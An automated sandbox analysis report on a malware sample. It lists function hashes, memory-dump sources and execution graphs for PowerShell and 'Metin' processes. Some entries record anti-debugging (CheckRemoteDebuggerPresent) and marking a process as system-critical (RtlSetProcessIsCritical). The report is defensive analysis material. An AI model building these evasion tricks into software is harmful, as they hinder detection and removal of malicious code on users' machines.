                                                                                                                    • Opcode ID: f0ba34ccf07c8427bef7960419423d5357b5e18a68180ad96090dff6c5ee2ca4
                                                                                                                    • Instruction ID: 2f0a898d060313d66463483bf55c83eedd1b21a9274b4652e40453a3360801a8
                                                                                                                    • Opcode Fuzzy Hash: f0ba34ccf07c8427bef7960419423d5357b5e18a68180ad96090dff6c5ee2ca4
                                                                                                                    • Instruction Fuzzy Hash: 97E0DF353007002B8268F26EBC9092FB6EEFEC55A0394C83DC14F9BA20DEB06C0197B1
                                                                                                                    Function 03619248 Relevance: .0, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bd562dae44f806e6436c49735a0a575786edfb5554074665de6fc30ba9f6b00b
                                                                                                                    • Instruction ID: 43bd7ed76e01dde8c5eda1eefe68d7990aa6dd306e2da2d35ac0bf4b63f0e4f0
                                                                                                                    • Opcode Fuzzy Hash: bd562dae44f806e6436c49735a0a575786edfb5554074665de6fc30ba9f6b00b
                                                                                                                    • Instruction Fuzzy Hash: 88F03970A043048BD360EBB8D49839ABBE9FB44310F044429D10EC7340DB35A8808B90
                                                                                                                    Function 0361B068 Relevance: .0, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e8e7bc3d521e7705a6468d01c6732c0b75b08e1fc3c9ebf0bda122e3852739f1
                                                                                                                    • Instruction ID: a34cb0adc108b8cca1707a3c8869ac015d3ecee0e245427db9e65df59dfec70f
                                                                                                                    • Opcode Fuzzy Hash: e8e7bc3d521e7705a6468d01c6732c0b75b08e1fc3c9ebf0bda122e3852739f1
                                                                                                                    • Instruction Fuzzy Hash: D4E0CD2674E3D01B4B17C13D64204A66FA38BD751131D84FED448CF342CC928C068365
                                                                                                                    Function 03618A58 Relevance: .0, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9bb05cb654a0f58fb7042b85e8d104b9d9decb8e4259e57f5a2d7bf6937c31ce
                                                                                                                    • Instruction ID: 10fde6fa9a9fb76e66eb90e8d52fec8a4a1b5e517b85483db681dfc90ee8a19c
                                                                                                                    • Opcode Fuzzy Hash: 9bb05cb654a0f58fb7042b85e8d104b9d9decb8e4259e57f5a2d7bf6937c31ce
                                                                                                                    • Instruction Fuzzy Hash: 02E02639308751C7CB087BB8A40C2AE7A9AEBC4724F04002EE60A87342CF78580183D9
                                                                                                                    Function 03619630 Relevance: .0, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 620e38686fde35e9a2b1e5b4f71b0851506cf2c696ddb7ddc0b12eaf9fcfac95
                                                                                                                    • Instruction ID: b65d2e877f1a0b0ea07ceb73c02748933c5764f7d91c5081de85e8a39fa841d8
                                                                                                                    • Opcode Fuzzy Hash: 620e38686fde35e9a2b1e5b4f71b0851506cf2c696ddb7ddc0b12eaf9fcfac95
                                                                                                                    • Instruction Fuzzy Hash: 2FD05E16B10365071664F0FA695067BA1CF8AC8AA1F0D013A9A0DDB341ED40CC2183F5
                                                                                                                    Function 0361DD78 Relevance: .0, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b6237de5d3b40be6824a9432a19c0d100d89a3227a030f538878058e4a1c521b
                                                                                                                    • Instruction ID: f0fbce56f246a28519b4b3090ee65d77b94696b4067eea8ee1e284efeeb1215c
                                                                                                                    • Opcode Fuzzy Hash: b6237de5d3b40be6824a9432a19c0d100d89a3227a030f538878058e4a1c521b
                                                                                                                    • Instruction Fuzzy Hash: 07E0C236700B25578216E65EA81096F77EBEEC5A71318842EE06ACB300DFA1DC018BE5
                                                                                                                    Function 0361DDC8 Relevance: .0, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                    • Instruction ID: 2073d41450dc1c3d161399e2542406d3acf72aa43367f6865439adb128dfe1a6
                                                                                                                    • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                    • Instruction Fuzzy Hash: 9EE08631B00014978B08D659D8144E9F7B9DBCC221F04847AD90AA7340DE32591687E1
                                                                                                                    Function 0361C660 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 52a49be4b126daa14f31cdd2ae700377e3539e476f625baf0572724b6d0007e5
                                                                                                                    • Instruction ID: 45152711e8a4ba4edfbbb88783487b875188919003040c4cadd28a19f93c0ef5
                                                                                                                    • Opcode Fuzzy Hash: 52a49be4b126daa14f31cdd2ae700377e3539e476f625baf0572724b6d0007e5
                                                                                                                    • Instruction Fuzzy Hash: B5E086357082919F8342736CA91946D7FE1FBD5261308007EE58DCB292D9558C068791
                                                                                                                    Function 036188E0 Relevance: .0, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6ec779ed1e47289158c0f43e637870a9c36311d02567d247fe9e669f012385cf
                                                                                                                    • Instruction ID: f287d902b3dba7c1235260a57258a22fca7a1cdf65b4878024c1c689116eb064
                                                                                                                    • Opcode Fuzzy Hash: 6ec779ed1e47289158c0f43e637870a9c36311d02567d247fe9e669f012385cf
                                                                                                                    • Instruction Fuzzy Hash: 0AE0DF30A09286DBCB08EBBCD00646EBFB2EB06214F0006ADED4997242C672045ACF81
                                                                                                                    Function 03618819 Relevance: .0, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2b403ca1ec9b98538be6611cb5930a560877518a9123560a8693691e996468ed
                                                                                                                    • Instruction ID: 96bf21aab42401863b14d315acd921c6c4537bed3884db4f7f7079b24f4e210b
                                                                                                                    • Opcode Fuzzy Hash: 2b403ca1ec9b98538be6611cb5930a560877518a9123560a8693691e996468ed
                                                                                                                    • Instruction Fuzzy Hash: 35E04F71A0A046CFCB0DFBA4D4594BD7F30EB05311F40489DE95753092DEB10546CB80
                                                                                                                    Function 0361C670 Relevance: .0, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24b259613d324c7f1249f7f44f7a358940ce5947d4d666a586641a57b1b21cc0
                                                                                                                    • Instruction ID: eef62e3fba3ceeb574402d65f1fc5224bc38e9bf61ac2bf8dd9dbfb82982c3ca
                                                                                                                    • Opcode Fuzzy Hash: 24b259613d324c7f1249f7f44f7a358940ce5947d4d666a586641a57b1b21cc0
                                                                                                                    • Instruction Fuzzy Hash: FED0A7363041129B4245735DB40D45E77E9E7C9662300003EE60DC7340DE219C0183E4
                                                                                                                    Function 0361F540 Relevance: .0, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3333541f41c9d54f6488fa70daf948d1e7b6a5e278d3ff631acd039d942dc30a
                                                                                                                    • Instruction ID: 5207708a378b95bba01cc2011b38e6a1ca970deb27aa6c14459b7b3413af71a6
                                                                                                                    • Opcode Fuzzy Hash: 3333541f41c9d54f6488fa70daf948d1e7b6a5e278d3ff631acd039d942dc30a
                                                                                                                    • Instruction Fuzzy Hash: 65E0D8709001465AC791CF7CC440095FFA09B06134B1486DE84558B255D6335103CBC0
                                                                                                                    Function 0361F550 Relevance: .0, Instructions: 16COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                    • Instruction ID: 23106f1cbb138c48891c5f183be1df078fc51adce6230034e6d0a27eb3818a06
                                                                                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                    • Instruction Fuzzy Hash: 54D067B0D042099F8780EFADC94156EFBF4EB58204F6485AA8919E7301E7329A128FD1
                                                                                                                    Function 03618828 Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 21236a75e8d654f31a5fa8ef666d0db2297449df5069a2ec1dc32968684eafd0
                                                                                                                    • Instruction ID: 0e891d9f81c1186a73db9d8b29607e3a0d855dbec2f88ae48496690490e37756
                                                                                                                    • Opcode Fuzzy Hash: 21236a75e8d654f31a5fa8ef666d0db2297449df5069a2ec1dc32968684eafd0
                                                                                                                    • Instruction Fuzzy Hash: 66D0673180810ACBCB0CFBA4E85A4BEBB74FB14311F40416DD91B53191EA311A5ACAC1
                                                                                                                    Function 036188F0 Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d5d0f5a7bf7cfba6359c8dc79b9689961541ff9ded9ef0c97ad22a0629d1813f
                                                                                                                    • Instruction ID: 1d169cd11bf3443600ba139c639cf64dede52e0893905b1fa019020adc09eb4d
                                                                                                                    • Opcode Fuzzy Hash: d5d0f5a7bf7cfba6359c8dc79b9689961541ff9ded9ef0c97ad22a0629d1813f
                                                                                                                    • Instruction Fuzzy Hash: 00D01734A0820ACBCB08EFA8E44686EBBB5EB44200F004169EE0993340EA306851CBC1
                                                                                                                    Function 03617A05 Relevance: .0, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 45b4c60cb4d3d0ffdcf6dd13e6cd345bfbd631602a6ffa056f3a9563dc2416d8
                                                                                                                    • Instruction ID: e3d6263ccd15274d694d56400c0e983f95a20c9f2e8e94724e2d68b310ac61bb
                                                                                                                    • Opcode Fuzzy Hash: 45b4c60cb4d3d0ffdcf6dd13e6cd345bfbd631602a6ffa056f3a9563dc2416d8
                                                                                                                    • Instruction Fuzzy Hash: 40C09B341C5344DFC7159FBAE48485D7F61BE4121571405EDE41B4A767CA73D445CF10
                                                                                                                    Function 03617A08 Relevance: .0, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f94b0251959362edcbb1a13bc6a379834ab6b5e0365513b27d5d9545037d3d12
                                                                                                                    • Instruction ID: 3801c062b5832e977a290be419f8f09e2cb45e1c7b717d0e51bb4cf1bfb566f9
                                                                                                                    • Opcode Fuzzy Hash: f94b0251959362edcbb1a13bc6a379834ab6b5e0365513b27d5d9545037d3d12
                                                                                                                    • Instruction Fuzzy Hash: EBB09230084708CFC208AF7AA40482C7729BA4020578008E9E42E0A3A68E36E844CA84
                                                                                                                    Function 03617F78 Relevance: .0, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a4ea52e127d4b350244cd453f8892df40fedf2886f26df0ae9d0c1781e796c72
                                                                                                                    • Instruction ID: a55b974ff32e733e47f46d10e94c4ca8af551fb832e858e2f3e4f2669b75e06c
                                                                                                                    • Opcode Fuzzy Hash: a4ea52e127d4b350244cd453f8892df40fedf2886f26df0ae9d0c1781e796c72
                                                                                                                    • Instruction Fuzzy Hash: 99B09232A202208BAF088E32818955A7B72EB863003128559A14282010CA34044A9640

                                                                                                                    Non-executed Functions

                                                                                                                    Function 08EE3E98 Relevance: .4, Instructions: 373COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1325661745.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8ee0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6dd073a2d4a9f91a86b0165c33b60c4394a094ebbc9b90561db22a1cef301c23
                                                                                                                    • Instruction ID: a612c6f95c9003281c64c6ce17033827d2014ba5ba33353997dc65c3d8c80e6c
                                                                                                                    • Opcode Fuzzy Hash: 6dd073a2d4a9f91a86b0165c33b60c4394a094ebbc9b90561db22a1cef301c23
                                                                                                                    • Instruction Fuzzy Hash: 8CE13A71B006059FDB14DF69C844BAEB7F1FF44309F14866DE40ADB2A1EB71E9468B90
                                                                                                                    Function 0361F635 Relevance: .1, Instructions: 108COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 23edb16f87b09d60d0593ff88c84c697a2c2fdbaf06f7d215b5c1c6508006797
                                                                                                                    • Instruction ID: d3d6b62010b423d1078e2395bacb2ad9a2479e9fd6e31d5b970d82223919dfad
                                                                                                                    • Opcode Fuzzy Hash: 23edb16f87b09d60d0593ff88c84c697a2c2fdbaf06f7d215b5c1c6508006797
                                                                                                                    • Instruction Fuzzy Hash: 33313632019B06AFD715EE2CE9555D4B320FE41634738025AC191CE266E762A277CBC5
                                                                                                                    Function 0361F6BD Relevance: .1, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 696826fe9b118b2ce094d4f19777ee610ad76214b4c5f606fddb7125038ed2cb
                                                                                                                    • Instruction ID: 417103b4c7d22492b5e1f08e8f8f4c6ffe1d1d957e8b178119de11a4f80082d5
                                                                                                                    • Opcode Fuzzy Hash: 696826fe9b118b2ce094d4f19777ee610ad76214b4c5f606fddb7125038ed2cb
                                                                                                                    • Instruction Fuzzy Hash: A811B432008F66AFD319EF3CD8652C4B720FE42624374415AC0D1CA5A8D772D295CFD9
                                                                                                                    Function 03613485 Relevance: 6.3, Strings: 5, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 9gm_$p$p$p$p
                                                                                                                    • API String ID: 0-750752749
                                                                                                                    • Opcode ID: 2d308cffcc7f7ce363d0644189a28a7415481fd874e4cde23c95628f72b96c95
                                                                                                                    • Instruction ID: 9efe9e74d170e866143f8740d7ad92684318b9f945ac20b827c8b9d9611a8581
                                                                                                                    • Opcode Fuzzy Hash: 2d308cffcc7f7ce363d0644189a28a7415481fd874e4cde23c95628f72b96c95
                                                                                                                    • Instruction Fuzzy Hash: D7219A96D0E7C25FE3078728A8793947F605F63058F1A01DBC891CF0E7EA09496EC7A2

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:13.8%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:16
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 14939 24c0871 14943 24c08c8 14939->14943 14948 24c08d8 14939->14948 14940 24c0889 14944 24c08fa 14943->14944 14953 24c0ce8 14944->14953 14957 24c0ce0 14944->14957 14945 24c093e 14945->14940 14949 24c08fa 14948->14949 14951 24c0ce8 GetConsoleWindow 14949->14951 14952 24c0ce0 GetConsoleWindow 14949->14952 14950 24c093e 14950->14940 14951->14950 14952->14950 14954 24c0d26 GetConsoleWindow 14953->14954 14956 24c0d56 14954->14956 14956->14945 14958 24c0d26 GetConsoleWindow 14957->14958 14960 24c0d56 14958->14960 14960->14945

                                                                                                                    Executed Functions

                                                                                                                    Function 024C0CE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 892 24c0ce0-24c0d54 GetConsoleWindow 895 24c0d5d-24c0d82 892->895 896 24c0d56-24c0d5c 892->896 896->895
                                                                                                                    APIs
                                                                                                                    • GetConsoleWindow.KERNELBASE ref: 024C0D47
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2541495077.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_24c0000_M2.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2863861424-0
                                                                                                                    • Opcode ID: 2aa412c5a491151755e792fc86c41682817ae31f35a3c7bd166d45b5aa55279f
                                                                                                                    • Instruction ID: c23cb3ad3f8759fb9204219e422a8c9935f8c3974c8ffed3f9ba5f783f6358b0
                                                                                                                    • Opcode Fuzzy Hash: 2aa412c5a491151755e792fc86c41682817ae31f35a3c7bd166d45b5aa55279f
                                                                                                                    • Instruction Fuzzy Hash: E8117375D043488FDB20CFAAC4447EEBBF0EB88220F24851AC45AA7240C7796945CFA0
                                                                                                                    Function 024C0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 900 24c0ce8-24c0d54 GetConsoleWindow 903 24c0d5d-24c0d82 900->903 904 24c0d56-24c0d5c 900->904 904->903
                                                                                                                    APIs
                                                                                                                    • GetConsoleWindow.KERNELBASE ref: 024C0D47
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2541495077.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_24c0000_M2.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2863861424-0
                                                                                                                    • Opcode ID: 07fae29229dc48123ab31dd71ee5e2481034acdcb96589c4e15818df44e94047
                                                                                                                    • Instruction ID: e59adccfb25d784b9cf81f0f71b07da79b22c265d7accf8ddc7c690701cc3e02
                                                                                                                    • Opcode Fuzzy Hash: 07fae29229dc48123ab31dd71ee5e2481034acdcb96589c4e15818df44e94047
                                                                                                                    • Instruction Fuzzy Hash: D91133B5D003498FDB24DFAAC4457DFFBF5EB48224F24841AC419A7244CB79A944CBA4

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:19.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:33.3%
                                                                                                                    Total number of Nodes:9
                                                                                                                    Total number of Limit Nodes:0

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF7C1417585 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 350 7ff7c1417585-7ff7c1417a6d CheckRemoteDebuggerPresent 354 7ff7c1417a6f 350->354 355 7ff7c1417a75-7ff7c1417ab8 350->355 354->355
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.2565009591.00007FF7C1410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1410000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_7ff7c1410000_Metin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3662101638-0
                                                                                                                    • Opcode ID: 2b2c1c90bec7af3de5da1840ee398bea7f82d69e892c7aa1a1b0a14aca84ecc0
                                                                                                                    • Instruction ID: 287b9e1f48392eceef8ea4846eb0cdbb706741e19a68dd953258241a2954a257
                                                                                                                    • Opcode Fuzzy Hash: 2b2c1c90bec7af3de5da1840ee398bea7f82d69e892c7aa1a1b0a14aca84ecc0
                                                                                                                    • Instruction Fuzzy Hash: 1131F47190861C8FDB58DF5CC84A7F9BBE0EF69321F14426ED48AD7242CB70A846CB91
                                                                                                                    Function 00007FF7C1418A1A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.2565009591.00007FF7C1410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1410000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_7ff7c1410000_Metin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalProcess
                                                                                                                    • String ID: O_^
                                                                                                                    • API String ID: 2695349919-897003143
                                                                                                                    • Opcode ID: 66edcf761c4612a802376a1ef8c13b60a488aca1ffafd0b4eb42ec6b99cd1ef6
                                                                                                                    • Instruction ID: 25a1db2e6560b7b8c3154ec6c17c244d677988c1d737f75fbe900dd8abd3e673
                                                                                                                    • Opcode Fuzzy Hash: 66edcf761c4612a802376a1ef8c13b60a488aca1ffafd0b4eb42ec6b99cd1ef6
                                                                                                                    • Instruction Fuzzy Hash: C831E07190CA588FDB28DF58D8497E9BBE0FF56311F14012EE08AD3682CB706846CB91
                                                                                                                    Function 00007FF7C141913D Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 232 7ff7c141913d-7ff7c1419220 RtlSetProcessIsCritical 236 7ff7c1419228-7ff7c141925d 232->236 237 7ff7c1419222 232->237 237->236
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.2565009591.00007FF7C1410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1410000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_7ff7c1410000_Metin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2695349919-0
